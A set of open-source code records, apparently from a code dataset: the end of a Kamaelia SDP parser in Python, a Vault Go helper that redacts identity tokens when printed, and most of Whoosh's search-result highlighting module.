        if self.shutdownMsg is None:
            self.shutdownMsg = producerFinished()
        self.send(self.shutdownMsg,"signal")

    def sendOutParsedSDP(self,session):
        # normalise it a bit first: copy the session-level connection line
        # into every media section (NOTE(review): this overwrites any
        # media-level connection line - confirm that is intended).
        if "connection" in session:
            for media in session['media']:
                media['connection'] = session['connection']
        self.send(session,"outbox")
def _parseline(line):
    """Parse a single SDP line of the form "<type>=<value>".

    Returns a (type, key, value) triple where *type* is the one-character
    SDP field type, *key* is the descriptive dictionary key used by
    SDPParser, and *value* is the parsed payload (format depends on the
    field type - see the module docstring).  Malformed lines raise
    AssertionError or AttributeError.

    Numeric fields are converted with int() (which in Python 2 promotes to
    long automatically, so values are unchanged).
    """
    match = re.match(r"^(.)=(.*)", line)
    type, value = match.group(1), match.group(2)
    if type == "v":
        # Only protocol version 0 (RFC 4566) is supported.
        assert(value == "0")
        return type, 'protocol_version', int(value)
    elif type == "o":
        user, sid, ver, ntype, atype, addr = re.match(r"^ *(\S+) +(\d+) +(\d+) +(IN) +(IP[46]) +(.+)", value).groups()
        return type, 'origin', (user, int(sid), int(ver), ntype, atype, addr)
    elif type == "s":
        return type, 'sessionname', value
    elif type == "i":
        return type, 'information', value
    elif type == "u":
        return type, 'URI', value
    elif type == "e":
        return type, 'email', value
    elif type == "p":
        return type, 'phone', value
    elif type == "c":
        if re.match(r"^ *IN +IP4 +.*$", value):
            match = re.match(r"^ *IN +IP4 +([^/]+)(?:/(\d+)(?:/(\d+))?)? *$", value)
            ntype, atype = "IN", "IP4"
            # NOTE: ttl/groupsize stay as *strings* when present in the SDP;
            # only the defaults are ints.  Callers rely on this quirk.
            addr, ttl, groupsize = match.groups()
            if ttl is None:
                ttl = 127
            if groupsize is None:
                groupsize = 1
        elif re.match(r"^ *IN +IP6 +.*$", value):
            # Fixed: the original omitted the string argument to re.match()
            # (raising TypeError) and never assigned ttl (NameError).
            # IPv6 connection lines carry no TTL, so it is reported as None.
            match = re.match(r"^ *IN +IP6 +([abcdefABCDEF0123456789:.]+)(?:/(\d+))? *$", value)
            ntype, atype = "IN", "IP6"
            addr, groupsize = match.groups()
            ttl = None
            if groupsize is None:
                groupsize = 1
        else:
            assert(False)
        return type, 'connection', (ntype, atype, addr, ttl, groupsize)
    elif type == "b":
        mode, rate = \
            re.match(r"^ *((?:AS)|(?:CT)|(?:X-[^:]+)):(\d+) *$", value).groups()
        bitspersecond = int(rate) * 1000
        return type, 'bandwidth', (mode, bitspersecond)
    elif type == "t":
        start, stop = [int(x) for x in re.match(r"^ *(\d+) +(\d+) *$", value).groups()]
        repeats = []  # 'r' lines are appended here later by the caller
        return type, 'time', (start, stop, repeats)
    elif type == "r":
        terms = re.split(r"\s+", value)
        parsedterms = []
        for term in terms:
            # Fixed: the original called re.match() without the string to
            # match against, and its pattern had no capture group for the
            # digits, so unpacking .groups() could never succeed.
            value, unit = re.match(r"^(\d+)([dhms])?$", term).groups()
            value = int(value) * {None: 1, "s": 1, "m": 60, "h": 3600, "d": 86400}[unit]
            parsedterms.append(value)
        interval, duration = parsedterms[0], parsedterms[1]
        offsets = parsedterms[2:]
        return type, 'repeats', (interval, duration, offsets)
    elif type == "z":
        adjustments = []
        while value.strip() != "":
            # Consume one "<adj-time> <offset>[dhms]" pair per iteration;
            # the trailing group re-binds value to the rest of the line.
            adjtime, offset, offsetunit, value = re.match(r"^ *(\d+) +([+-]?\d+)([dhms])? *?(.*)$", value).groups()
            adjtime = int(adjtime)
            offset = int(offset) * {None: 1, "s": 1, "m": 60, "h": 3600, "d": 86400}[offsetunit]
            adjustments.append((adjtime, offset))
        return type, 'timezone adjustments', adjustments
    elif type == "k":
        method, value = re.match(r"^(clear|base64|uri|prompt)(?:[:](.*))?$", value).groups()
        return type, "encryption", (method, value)
    elif type == "a":
        return type, 'attribute', value
    elif type == "m":
        media, port, numports, protocol, fmt = re.match(r"^(audio|video|text|application|message) +(\d+)(?:[/](\d+))? +([^ ]+) +(.+)$", value).groups()
        port = int(port)
        if numports is None:
            numports = 1
        else:
            numports = int(numports)
        return type, 'media', (media, port, numports, protocol, fmt)
    else:
        # Unrecognised field types are passed through unparsed.
        return type, 'unknown', value
__kamaelia_components__ = ( SDPParser, )

if __name__ == "__main__":
    # Quick demonstration: feed two back-to-back session descriptions
    # through the parser and print the resulting dictionaries.  The second
    # session starts at the second "v=0" line; the trailing "v=0" triggers
    # emission of the second session.
    from Kamaelia.Util.DataSource import DataSource
    from Kamaelia.Chassis.Pipeline import Pipeline
    from Kamaelia.Util.Console import ConsoleEchoer

    sdp = """\
v=0
o=jdoe 2890844526 2890842807 IN IP4 10.47.16.5
s=SDP Seminar
i=A Seminar on the session description protocol
u=http://www.example.com/seminars/sdp.pdf
e=j.doe@example.com (Jane Doe)
c=IN IP4 224.2.17.12/127
t=2873397496 2873404696
a=recvonly
m=audio 49170 RTP/AVP 0
m=video 51372 RTP/AVP 99
a=rtpmap:99 h263-1998/90000
v=0
o=bfcrd 1140190501 1140190501 IN IP4 132.185.224.80
s=BFC ONE [H.264/AVC]
i=Multicast trial service from the BBC! Get BFC FLURBLE here!
a=x-qt-text-nam:BFC FLURBLE [H.264/AVC]
a=x-qt-text-aut:BFC Research & Development
a=x-qt-text-cpy:Copyright (c) 2006 British Flurbling Corporation
u=http://www.bbc.co.uk/multicast/
e=Multicast Support <multicast-tech@bfc.co.uk>
t=0 0
c=IN IP4 233.122.227.151/32
m=video 5150 RTP/AVP 33
b=AS:1200000
a=type:broadcast
a=mux:m2t
v=0
""".splitlines()

    Pipeline( DataSource(sdp),
              SDPParser(),
              ConsoleEchoer(),
            ).run()
|
unknown
|
codeparrot/codeparrot-clean
| ||
// Copyright IBM Corp. 2016, 2025
// SPDX-License-Identifier: MPL-2.0
package pluginutil
import (
"time"
)
// redactedTokenString is the fixed placeholder returned by
// IdentityToken.String so raw token material never appears in
// logs or formatted output.
const redactedTokenString = "ey***"

// IdentityTokenRequest holds the parameters a plugin supplies when
// requesting an identity token.
type IdentityTokenRequest struct {
	// Audience identifies the recipient of the token. The requested
	// value will be in the "aud" claim. Required.
	Audience string
	// TTL is the requested duration that the token will be valid for.
	// Optional with a default of 1hr.
	TTL time.Duration
}

// IdentityTokenResponse is the result of an identity token request.
type IdentityTokenResponse struct {
	// Token is the plugin identity token.
	Token IdentityToken
	// TTL is the duration that the token is valid for after truncation is applied.
	// The TTL may be truncated depending on the lifecycle of its signing key.
	TTL time.Duration
}

// IdentityToken is a plugin identity token whose String method redacts
// the contents; call Token() to read the real value.
type IdentityToken string
// String returns a redacted token string. Use the Token() method
// to obtain the non-redacted token contents. Because this satisfies
// fmt.Stringer, formatting an IdentityToken with %s/%v prints the
// redacted placeholder rather than the secret.
func (t IdentityToken) String() string {
	return redactedTokenString
}

// Token returns the non-redacted token contents.
func (t IdentityToken) Token() string {
	return string(t)
}
|
go
|
github
|
https://github.com/hashicorp/vault
|
sdk/helper/pluginutil/identity_token.go
|
# Copyright 2008 Matt Chaput. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY MATT CHAPUT ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL MATT CHAPUT OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are
# those of the authors and should not be interpreted as representing official
# policies, either expressed or implied, of Matt Chaput.
"""The highlight module contains classes and functions for displaying short
excerpts from hit documents in the search results you present to the user, with
query terms highlighted.
The highlighting system has four main elements.
* **Fragmenters** chop up the original text into __fragments__, based on the
locations of matched terms in the text.
* **Scorers** assign a score to each fragment, allowing the system to rank the
best fragments by whatever criterion.
* **Order functions** control in what order the top-scoring fragments are
presented to the user. For example, you can show the fragments in the order
they appear in the document (FIRST) or show higher-scoring fragments first
(SCORE)
* **Formatters** turn the fragment objects into human-readable output, such as
an HTML string.
See :doc:`/highlight` for more information.
"""
from __future__ import division
from collections import deque
from heapq import nlargest
from itertools import groupby
from whoosh.compat import htmlescape
from whoosh.analysis import Token
# The default value for the maximum chars to examine when fragmenting
DEFAULT_CHARLIMIT = 2 ** 15
# Fragment object
def mkfrag(text, tokens, startchar=None, endchar=None,
           charsbefore=0, charsafter=0):
    """Build a :class:`Fragment` from ``tokens`` (a list of
    :class:`analysis.Token` objects).  When ``startchar``/``endchar`` are
    not given they default to the span of the token list (or the whole
    text when ``tokens`` is empty); the span is then widened by
    ``charsbefore``/``charsafter`` and clamped to the bounds of ``text``.
    """
    if startchar is None:
        startchar = tokens[0].startchar if tokens else 0
    if endchar is None:
        endchar = tokens[-1].endchar if tokens else len(text)
    return Fragment(text, tokens,
                    max(0, startchar - charsbefore),
                    min(len(text), endchar + charsafter))
class Fragment(object):
    """A single extract from a hit document.

    Tracks the character span of the fragment within the source text and
    the matched-term objects inside it; it does not hold a copy of the
    fragment's text.

    Useful attributes:

    ``text`` - the entire original text the fragment is taken from.
    ``matches`` - ordered list of match objects, each with ``startchar``
    and ``endchar`` attributes.
    ``startchar`` / ``endchar`` - the fragment's span within ``text``.
    ``matched_terms`` - set of the ``text`` of the matched terms, when
    the match objects carry a ``text`` attribute.
    """

    def __init__(self, text, matches, startchar=0, endchar=-1):
        """
        :param text: the source text of the fragment.
        :param matches: objects having ``startchar`` and ``endchar``
            attributes, and optionally a ``text`` attribute.
        :param startchar: index into ``text`` where the fragment starts
            (default 0).
        :param endchar: index into ``text`` where the fragment ends;
            -1 (the default) means the end of ``text``.
        """
        self.text = text
        self.matches = matches
        self.startchar = startchar
        self.endchar = len(text) if endchar == -1 else endchar
        self.matched_terms = set(m.text for m in matches
                                 if hasattr(m, "text"))

    def __repr__(self):
        return "<Fragment %d:%d %d>" % (self.startchar, self.endchar,
                                        len(self.matches))

    def __len__(self):
        return self.endchar - self.startchar

    def overlaps(self, fragment):
        a, b = self.startchar, self.endchar
        return (a < fragment.startchar < b) or (a < fragment.endchar < b)

    def overlapped_length(self, fragment):
        # NOTE(review): despite the name, this returns the length of the
        # *union* of the two spans, not of their intersection.  Preserved
        # as-is because callers may depend on it.
        return (max(self.endchar, fragment.endchar)
                - min(self.startchar, fragment.startchar))

    def __lt__(self, other):
        # Arbitrary but total ordering so fragments can live in heaps.
        return id(self) < id(other)
# Tokenizing
def set_matched_filter(tokens, termset):
    """Pass tokens through unchanged, setting each token's ``matched``
    flag according to whether its text is a member of ``termset``."""
    for token in tokens:
        token.matched = token.text in termset
        yield token
# Fragmenters
class Fragmenter(object):
    """Base class for fragmenters: objects that chop highlighted text into
    candidate fragments based on where the matched terms occur."""

    def must_retokenize(self):
        """Returns True if this fragmenter requires retokenized text.
        If this method returns True, the fragmenter's ``fragment_tokens``
        method will be called with an iterator of ALL tokens from the text,
        with the tokens for matched terms having the ``matched`` attribute set
        to True.
        If this method returns False, the fragmenter's ``fragment_matches``
        method will be called with a LIST of matching tokens.
        """
        return True

    def fragment_tokens(self, text, all_tokens):
        """Yields :class:`Fragment` objects based on the tokenized text.
        :param text: the string being highlighted.
        :param all_tokens: an iterator of :class:`analysis.Token`
            objects from the string.
        """
        raise NotImplementedError

    def fragment_matches(self, text, matched_tokens):
        """Yields :class:`Fragment` objects based on the text and the matched
        terms.
        :param text: the string being highlighted.
        :param matched_tokens: a list of :class:`analysis.Token` objects
            representing the term matches in the string.
        """
        raise NotImplementedError
class WholeFragmenter(Fragmenter):
    """Doesn't fragment the token stream. This object just returns the
    entire stream as one "fragment". This is useful if you want to highlight
    the entire text.
    Note that even if you use the `WholeFragmenter`, the highlight code will
    return no fragment if no terms matched in the given field. To return the
    whole fragment even in that case, call `highlights()` with `minscore=0`::
        # Query where no terms match in the "text" field
        q = query.Term("tag", "new")
        r = mysearcher.search(q)
        r.fragmenter = highlight.WholeFragmenter()
        r.formatter = highlight.UppercaseFormatter()
        # Since no terms in the "text" field matched, we get no fragments back
        assert r[0].highlights("text") == ""
        # If we lower the minimum score to 0, we get a fragment even though it
        # has no matching terms
        assert r[0].highlights("text", minscore=0) == "This is the text field."
    """

    def __init__(self, charlimit=DEFAULT_CHARLIMIT):
        """
        :param charlimit: stop collecting matches once a token ends beyond
            this many characters into the text (falsy disables the limit).
        """
        self.charlimit = charlimit

    def fragment_tokens(self, text, tokens):
        charlimit = self.charlimit
        matches = []
        for t in tokens:
            if charlimit and t.endchar > charlimit:
                # Past the examination limit: stop scanning entirely.
                break
            if t.matched:
                matches.append(t.copy())
        # Single fragment covering the whole text, carrying all matches.
        return [Fragment(text, matches)]
# Backwards compatibility
NullFragmeter = WholeFragmenter
class SentenceFragmenter(Fragmenter):
    """Breaks the text up on sentence end punctuation characters
    (".", "!", or "?"). This object works by looking in the original text for a
    sentence end as the next character after each token's 'endchar'.
    When highlighting with this fragmenter, you should use an analyzer that
    does NOT remove stop words, for example::
        sa = StandardAnalyzer(stoplist=None)
    """

    def __init__(self, maxchars=200, sentencechars=".!?",
                 charlimit=DEFAULT_CHARLIMIT):
        """
        :param maxchars: The maximum number of characters allowed in a
            fragment.
        :param sentencechars: the characters treated as sentence-ending
            punctuation.
        :param charlimit: stop scanning once a token ends beyond this many
            characters into the text.
        """
        self.maxchars = maxchars
        self.sentencechars = frozenset(sentencechars)
        self.charlimit = charlimit

    def fragment_tokens(self, text, tokens):
        maxchars = self.maxchars
        sentencechars = self.sentencechars
        charlimit = self.charlimit
        textlen = len(text)
        # startchar of first token in the current sentence
        first = None
        # Buffer for matched tokens in the current sentence
        tks = []
        endchar = None
        # Number of chars in the current sentence
        # (NOTE: counts token characters only, not the gaps between them)
        currentlen = 0

        for t in tokens:
            startchar = t.startchar
            endchar = t.endchar
            if charlimit and endchar > charlimit:
                break

            if first is None:
                # Remember the startchar of the first token in a sentence
                first = startchar
                currentlen = 0

            tlength = endchar - startchar
            currentlen += tlength

            if t.matched:
                tks.append(t.copy())

            # If the character after the current token is end-of-sentence
            # punctuation, finish the sentence and reset
            if endchar < textlen and text[endchar] in sentencechars:
                # Don't break for two periods in a row (e.g. ignore "...")
                if endchar + 1 < textlen and text[endchar + 1] in sentencechars:
                    continue

                # If the sentence had matches and it's not too long, yield it
                # as a token
                if tks and currentlen <= maxchars:
                    yield mkfrag(text, tks, startchar=first, endchar=endchar)
                # Reset the counts
                tks = []
                first = None
                currentlen = 0

        # If we get to the end of the text and there's still a sentence
        # in the buffer, yield it
        if tks:
            yield mkfrag(text, tks, startchar=first, endchar=endchar)
class ContextFragmenter(Fragmenter):
    """Looks for matched terms and aggregates them with their surrounding
    context.
    """

    def __init__(self, maxchars=200, surround=20, charlimit=DEFAULT_CHARLIMIT):
        """
        :param maxchars: The maximum number of characters allowed in a
            fragment.
        :param surround: The number of extra characters of context to add both
            before the first matched term and after the last matched term.
        :param charlimit: stop scanning once a token ends beyond this many
            characters into the text.
        """
        self.maxchars = maxchars
        self.surround = surround
        self.charlimit = charlimit

    def fragment_tokens(self, text, tokens):
        maxchars = self.maxchars
        surround = self.surround
        charlimit = self.charlimit

        # startchar of the first token in the fragment
        first = None
        # Stack of startchars
        firsts = deque()
        # Each time we see a matched token, we reset the countdown to finishing
        # the fragment. This also indicates whether we're currently inside a
        # fragment (< 0 not in fragment, >= 0 in fragment)
        countdown = -1
        # Tokens in current fragment
        tks = []
        endchar = None
        # Number of chars in the current fragment
        currentlen = 0

        for t in tokens:
            startchar = t.startchar
            endchar = t.endchar
            tlength = endchar - startchar
            if charlimit and endchar > charlimit:
                break

            if countdown < 0 and not t.matched:
                # We're not in a fragment currently, so just maintain the
                # "charsbefore" buffer
                firsts.append(startchar)
                while firsts and endchar - firsts[0] > surround:
                    firsts.popleft()
            elif currentlen + tlength > maxchars:
                # We're in a fragment, but adding this token would put us past
                # the maximum size. Zero the countdown so the code below will
                # cause the fragment to be emitted
                countdown = 0
            elif t.matched:
                # Start/restart the countdown
                countdown = surround
                # Remember the first char of this fragment
                if first is None:
                    if firsts:
                        first = firsts[0]
                    else:
                        first = startchar
                        # Add on unused front context
                        countdown += surround
                tks.append(t.copy())

            # If we're in a fragment...
            if countdown >= 0:
                # Update the counts
                currentlen += tlength
                countdown -= tlength

                # If the countdown is expired
                if countdown <= 0:
                    # Finish the fragment
                    yield mkfrag(text, tks, startchar=first, endchar=endchar)
                    # Reset the counts
                    tks = []
                    firsts = deque()
                    first = None
                    currentlen = 0

        # If there's a fragment left over at the end, yield it
        if tks:
            yield mkfrag(text, tks, startchar=first, endchar=endchar)
class PinpointFragmenter(Fragmenter):
    """This is a NON-RETOKENIZING fragmenter. It builds fragments from the
    positions of the matched terms.
    """

    def __init__(self, maxchars=200, surround=20, autotrim=False,
                 charlimit=DEFAULT_CHARLIMIT):
        """
        :param maxchars: The maximum number of characters allowed in a
            fragment.
        :param surround: The number of extra characters of context to add both
            before the first matched term and after the last matched term.
        :param autotrim: automatically trims text before the first space and
            after the last space in the fragments, to try to avoid truncated
            words at the start and end. For short fragments or fragments with
            long runs between spaces this may give strange results.
        :param charlimit: stop building fragments once a match ends beyond
            this many characters into the text.
        """
        self.maxchars = maxchars
        self.surround = surround
        self.autotrim = autotrim
        self.charlimit = charlimit

    def must_retokenize(self):
        # Works directly from the matched tokens; no retokenization needed.
        return False

    def fragment_tokens(self, text, tokens):
        # Adapter so this fragmenter can also be driven by a full token
        # stream: keep only the matched tokens.
        matched = [t for t in tokens if t.matched]
        return self.fragment_matches(text, matched)

    @staticmethod
    def _autotrim(fragment):
        # Snap the fragment's span to word boundaries (first/last space),
        # but never trim away part of an actual match.
        text = fragment.text
        startchar = fragment.startchar
        endchar = fragment.endchar

        firstspace = text.find(" ", startchar, endchar)
        if firstspace > 0:
            startchar = firstspace + 1
        lastspace = text.rfind(" ", startchar, endchar)
        if lastspace > 0:
            endchar = lastspace

        if fragment.matches:
            # Re-expand so the first and last matches stay inside the span.
            startchar = min(startchar, fragment.matches[0].startchar)
            endchar = max(endchar, fragment.matches[-1].endchar)

        fragment.startchar = startchar
        fragment.endchar = endchar

    def fragment_matches(self, text, tokens):
        maxchars = self.maxchars
        surround = self.surround
        autotrim = self.autotrim
        charlimit = self.charlimit

        j = -1
        for i, t in enumerate(tokens):
            if j >= i:
                # This token was already absorbed into a previous fragment.
                continue
            j = i
            left = t.startchar
            right = t.endchar
            if charlimit and right > charlimit:
                break

            currentlen = right - left
            # Greedily absorb the following matches that are close enough
            # (within `surround`) while staying under maxchars.
            while j < len(tokens) - 1 and currentlen < maxchars:
                next = tokens[j + 1]
                ec = next.endchar
                if ec - right <= surround and ec - left <= maxchars:
                    j += 1
                    right = ec
                    currentlen += (ec - next.startchar)
                else:
                    break

            # Pad with surrounding context, clamped to the text bounds.
            left = max(0, left - surround)
            right = min(len(text), right + surround)
            fragment = Fragment(text, tokens[i:j + 1], left, right)
            if autotrim:
                self._autotrim(fragment)
            yield fragment
# Fragment scorers
class FragmentScorer(object):
    """Marker base class for fragment scorers (no behavior of its own)."""
    pass


class BasicFragmentScorer(FragmentScorer):
    """Scores a fragment by the total boost of its matched terms, scaled
    up by how many *distinct* terms it matched (favoring diversity)."""

    def __call__(self, f):
        boost_total = sum(match.boost for match in f.matches)
        diversity = len(f.matched_terms) * 100
        return boost_total * (diversity or 1)
# Fragment sorters
def SCORE(fragment):
    "Sorts higher scored passages first."
    # NOTE(review): this key is a constant, so it relies on the caller
    # already producing fragments in score order - confirm against the
    # highlight driver before changing.
    return 1

def FIRST(fragment):
    "Sorts passages from earlier in the document first."
    return fragment.startchar

def LONGER(fragment):
    "Sorts longer passages first."
    return 0 - len(fragment)

def SHORTER(fragment):
    "Sort shorter passages first."
    return len(fragment)
# Formatters
def get_text(original, token, replace):
    """Return the text to display for a match when formatting.

    When ``replace`` is true this is the token's own ``text`` attribute;
    otherwise it is the slice of ``original`` between the token's
    ``startchar`` and ``endchar``.
    """
    return token.text if replace else original[token.startchar:token.endchar]
class Formatter(object):
    """Base class for formatters.
    For highlighters that return strings, it is usually only necessary to
    override :meth:`Formatter.format_token`.
    Use the :func:`get_text` function as a convenience to get the token text::
        class MyFormatter(Formatter):
            def format_token(text, token, replace=False):
                ttext = get_text(text, token, replace)
                return "[%s]" % ttext
    """

    # Text inserted between fragments by format()
    between = "..."

    def _text(self, text):
        # Hook for subclasses to transform non-matched text (e.g. escaping).
        return text

    def format_token(self, text, token, replace=False):
        """Returns a formatted version of the given "token" object, which
        should have at least ``startchar`` and ``endchar`` attributes, and
        a ``text`` attribute if ``replace`` is True.
        :param text: the original fragment text being highlighted.
        :param token: an object having ``startchar`` and ``endchar`` attributes
            and optionally a ``text`` attribute (if ``replace`` is True).
        :param replace: if True, the original text between the token's
            ``startchar`` and ``endchar`` indices will be replaced with the
            value of the token's ``text`` attribute.
        """
        raise NotImplementedError

    def format_fragment(self, fragment, replace=False):
        """Returns a formatted version of the given text, using the "token"
        objects in the given :class:`Fragment`.
        :param fragment: a :class:`Fragment` object representing a list of
            matches in the text.
        :param replace: if True, the original text corresponding to each
            match will be replaced with the value of the token object's
            ``text`` attribute.
        """
        output = []
        index = fragment.startchar
        text = fragment.text

        for t in fragment.matches:
            if t.startchar is None:
                # Match carries no position information; nothing to render.
                continue
            if t.startchar < index:
                # Skip matches overlapping text that was already emitted.
                continue
            if t.startchar > index:
                # Emit the unmatched text leading up to this match.
                output.append(self._text(text[index:t.startchar]))
            output.append(self.format_token(text, t, replace))
            index = t.endchar
        # Trailing unmatched text after the last match.
        output.append(self._text(text[index:fragment.endchar]))

        out_string = "".join(output)
        return out_string

    def format(self, fragments, replace=False):
        """Returns a formatted version of the given text, using a list of
        :class:`Fragment` objects.
        """
        formatted = [self.format_fragment(f, replace=replace)
                     for f in fragments]
        return self.between.join(formatted)

    def __call__(self, text, fragments):
        # For backwards compatibility
        return self.format(fragments)
class NullFormatter(Formatter):
    """Formatter that returns the matched text without any decoration."""

    def format_token(self, text, token, replace=False):
        token_text = get_text(text, token, replace)
        return token_text
class UppercaseFormatter(Formatter):
    """Returns a string in which the matched terms are in UPPERCASE."""

    def __init__(self, between="..."):
        """
        :param between: the text to add between fragments.
        """
        self.between = between

    def format_token(self, text, token, replace=False):
        # Upper-case the matched span (or its replacement text).
        return get_text(text, token, replace).upper()
class HtmlFormatter(Formatter):
    """Returns a string containing HTML formatting around the matched terms.

    This formatter wraps matched terms in an HTML element with two class names.
    The first class name (set with the constructor argument ``classname``) is
    the same for each match. The second class name (set with the constructor
    argument ``termclass``) is different depending on which term matched. This
    allows you to give different formatting (for example, different background
    colors) to the different terms in the excerpt.

    >>> hf = HtmlFormatter(tagname="span", classname="match", termclass="term")
    >>> hf(mytext, myfragments)
    "The <span class="match term0">template</span> <span class="match term1">geometry</span> is..."

    This object maintains a dictionary mapping terms to HTML class names (e.g.
    ``term0`` and ``term1`` above), so that multiple excerpts will use the same
    class for the same term. If you want to re-use the same HtmlFormatter
    object with different searches, you should call HtmlFormatter.clean()
    between searches to clear the mapping.
    """

    # Substitutions: tag name, attribute quote char, class names, term number
    # (appended to termclass), and the escaped token text.
    template = '<%(tag)s class=%(q)s%(cls)s%(tn)s%(q)s>%(t)s</%(tag)s>'

    def __init__(self, tagname="strong", between="...",
                 classname="match", termclass="term", maxclasses=5,
                 attrquote='"'):
        """
        :param tagname: the tag to wrap around matching terms.
        :param between: the text to add between fragments.
        :param classname: the class name to add to the elements wrapped around
            matching terms.
        :param termclass: the class name prefix for the second class which is
            different for each matched term.
        :param maxclasses: the maximum number of term classes to produce. This
            limits the number of classes you have to define in CSS by recycling
            term class names. For example, if you set maxclasses to 3 and have
            5 terms, the 5 terms will use the CSS classes ``term0``, ``term1``,
            ``term2``, ``term0``, ``term1``.
        :param attrquote: the character used to quote the ``class`` attribute
            value in the produced markup.
        """
        self.between = between
        self.tagname = tagname
        self.classname = classname
        self.termclass = termclass
        self.attrquote = attrquote
        self.maxclasses = maxclasses
        # Maps term text -> assigned term class number (see format_token).
        self.seen = {}
        self.htmlclass = " ".join((self.classname, self.termclass))

    def _text(self, text):
        # Escape plain (non-match) text so it is safe to embed in HTML.
        return htmlescape(text, quote=False)

    def format_token(self, text, token, replace=False):
        seen = self.seen
        ttext = self._text(get_text(text, token, replace))
        if ttext in seen:
            termnum = seen[ttext]
        else:
            # New term: assign the next class number, recycling modulo
            # maxclasses so the CSS only needs a fixed number of classes.
            termnum = len(seen) % self.maxclasses
            seen[ttext] = termnum

        return self.template % {"tag": self.tagname, "q": self.attrquote,
                                "cls": self.htmlclass, "t": ttext,
                                "tn": termnum}

    def clean(self):
        """Clears the dictionary mapping terms to HTML classnames.
        """
        self.seen = {}
class GenshiFormatter(Formatter):
    """Returns a Genshi event stream containing HTML formatting around the
    matched terms.
    """

    def __init__(self, qname="strong", between="..."):
        """
        :param qname: the QName for the tag to wrap around matched terms.
        :param between: the text to add between fragments.
        """
        self.qname = qname
        self.between = between

        # Imported lazily so genshi is only required when this formatter is
        # actually instantiated.
        from genshi.core import START, END, TEXT  # @UnresolvedImport
        from genshi.core import Attrs, Stream  # @UnresolvedImport
        self.START, self.END, self.TEXT = START, END, TEXT
        self.Attrs, self.Stream = Attrs, Stream

    def _add_text(self, text, output):
        # Coalesce with a trailing TEXT event instead of appending a new one.
        if output and output[-1][0] == self.TEXT:
            output[-1] = (self.TEXT, output[-1][1] + text, output[-1][2])
        else:
            output.append((self.TEXT, text, (None, -1, -1)))

    def format_token(self, text, token, replace=False):
        qn = self.qname
        txt = get_text(text, token, replace)
        # START/TEXT/END event triple wrapping the matched text.
        return self.Stream([(self.START, (qn, self.Attrs()), (None, -1, -1)),
                            (self.TEXT, txt, (None, -1, -1)),
                            (self.END, qn, (None, -1, -1))])

    def format_fragment(self, fragment, replace=False):
        output = []
        index = fragment.startchar
        text = fragment.text

        for t in fragment.matches:
            if t.startchar > index:
                self._add_text(text[index:t.startchar], output)
            # NOTE(review): this appends a raw (text, token, replace) tuple
            # rather than the events produced by format_token(); confirm
            # whether Stream() accepts this or whether
            # self.format_token(text, t, replace) was intended here.
            output.append((text, t, replace))
            index = t.endchar
        if index < len(text):
            self._add_text(text[index:], output)
        return self.Stream(output)

    def format(self, fragments, replace=False):
        output = []
        first = True
        for fragment in fragments:
            if not first:
                # Separator text between fragments.
                self._add_text(self.between, output)
            output += self.format_fragment(fragment, replace=replace)
            first = False
        return self.Stream(output)
# Highlighting
def top_fragments(fragments, count, scorer, order, minscore=1):
    """Return up to ``count`` of the highest-scoring fragments (as scored by
    ``scorer``) whose score is at least ``minscore``, sorted by the ``order``
    key function.
    """
    scored_fragments = ((scorer(f), f) for f in fragments)
    # Compare on the score only: without an explicit key, nlargest falls back
    # to comparing the fragment objects themselves when scores tie, which
    # raises TypeError for fragment types that don't define ordering.
    scored_fragments = nlargest(count, scored_fragments,
                                key=lambda sf: sf[0])
    best_fragments = [sf for score, sf in scored_fragments if score >= minscore]
    best_fragments.sort(key=order)
    return best_fragments
def highlight(text, terms, analyzer, fragmenter, formatter, top=3,
              scorer=None, minscore=1, order=FIRST, mode="query"):
    """Convenience function: tokenize ``text``, mark tokens matching
    ``terms``, fragment, score and format the best fragments.

    :param scorer: fragment scorer instance or class; defaults to
        BasicFragmentScorer.
    :param order: key function used to sort the selected fragments.
    """
    if scorer is None:
        scorer = BasicFragmentScorer()

    # Allow passing classes instead of instances for the pluggable pieces.
    # (The original code repeated the "scorer is None" check after this
    # point; that branch was unreachable and has been removed.)
    if type(fragmenter) is type:
        fragmenter = fragmenter()
    if type(formatter) is type:
        formatter = formatter()
    if type(scorer) is type:
        scorer = scorer()

    termset = frozenset(terms)
    tokens = analyzer(text, chars=True, mode=mode, removestops=False)
    tokens = set_matched_filter(tokens, termset)
    fragments = fragmenter.fragment_tokens(text, tokens)
    fragments = top_fragments(fragments, top, scorer, order, minscore)
    return formatter(text, fragments)
class Highlighter(object):
    """Bundles a fragmenter, scorer and formatter and highlights the matched
    terms of a search hit, using stored character offsets ("pinpoint"
    highlighting) when possible instead of re-tokenizing the text.
    """

    def __init__(self, fragmenter=None, scorer=None, formatter=None,
                 always_retokenize=False, order=FIRST):
        self.fragmenter = fragmenter or ContextFragmenter()
        self.scorer = scorer or BasicFragmentScorer()
        # Default formatter wraps matches in <b> tags.
        self.formatter = formatter or HtmlFormatter(tagname="b")
        self.order = order
        self.always_retokenize = always_retokenize

    def can_load_chars(self, results, fieldname):
        """Return True if stored character offsets can be used to highlight
        ``fieldname`` without re-tokenizing the text.
        """
        # Is it possible to build a mapping between the matched terms/docs and
        # their start and end chars for "pinpoint" highlighting (ie not require
        # re-tokenizing text)?
        if self.always_retokenize:
            # No, we've been configured to always retokenize some text
            return False
        if not results.has_matched_terms():
            # No, we don't know what the matched terms are yet
            return False
